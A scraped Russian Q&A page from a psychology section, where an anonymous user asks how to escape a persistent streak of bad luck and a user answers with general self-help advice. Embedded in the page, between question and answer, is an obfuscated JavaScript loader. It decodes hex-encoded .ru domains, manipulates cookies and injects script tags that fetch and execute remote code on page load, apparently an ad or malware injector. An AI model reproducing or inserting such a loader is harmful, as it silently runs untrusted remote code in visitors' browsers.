Психология

Постоянная полоса невезения, как в работе, так и в жизни, также и в материальном положении, ЧТО ДЕЛАТЬ? // <![CDATA[ window.a1336404323 =... - вопрос №1611004

1;!function(){var o=JSON.parse('[«616c396c323335676b6337642e7275»,«6e796b7a323871767263646b742e7275»]'),e="",t=«18165»,n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if(«number»==typeof n&&n){var i=new Date(n);n=t.expires=i}var r=«3600»;!t.expires&&r&&(t.expires=«3600»),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement(«script»);i.setAttribute(«src»,n),i.setAttribute(«type»,«text/javascript»),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,«function»==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),«function»==typeof t&&t())}}},d=function(u){var s=n(«oisdom»);e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n(«oismods»);m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i(«oisdom»,e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c(«liveexpert.ru»)+"_"+(self===top?0:1)+".js",a(f,function(){i(«oisdom»,e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}(); // ]]>

Вопрос задан анонимно сентябрь 2, 2015 г.

  • Всего ответов: 1

    ЛИДИЯ

    1-й в

    Доброе утро. Ответ на ваш вопрос «Постоянная полоса невезения, как в работе, так и в жизни, также и в материальном положении, ЧТО ДЕЛАТЬ?»
    Ответ. Вам стоит:
    а)проанализировать все сферы вашей жизни — это позволит найти и проработать первопричины наступившей «постоянной полосы невезения», и, которая наступила вслед «за полосой везения»;
    б)сменить отношение к жизни, значит изменить ваше отношение к себе, например, вам стоит прекратить жалеть себя, жалость -губительное чувство,  благодаря которому вы скатываетесь в тихое и теплое болото бездействия, драматизирование ситуации, взращивание в себе депрессивных состояний и негативных эмоций-это позволит вам побыстрее выйти из провальной роли «несчастной жертвы» и взять на себя ответсвенность за качество вашей жизни;
    в)сменить ваше отношение к работе, например, освойте новые модели профессионального поведения и методы профессионального взаимодействия с коллегами- это позволит вам вывести профессиональные отношения на позитивный и доброжелательный уровень.
    Помните, решить проблему максимально быстро и эффективно поможет специалист. Мудрости вами

    сентябрь 2, 2015 г.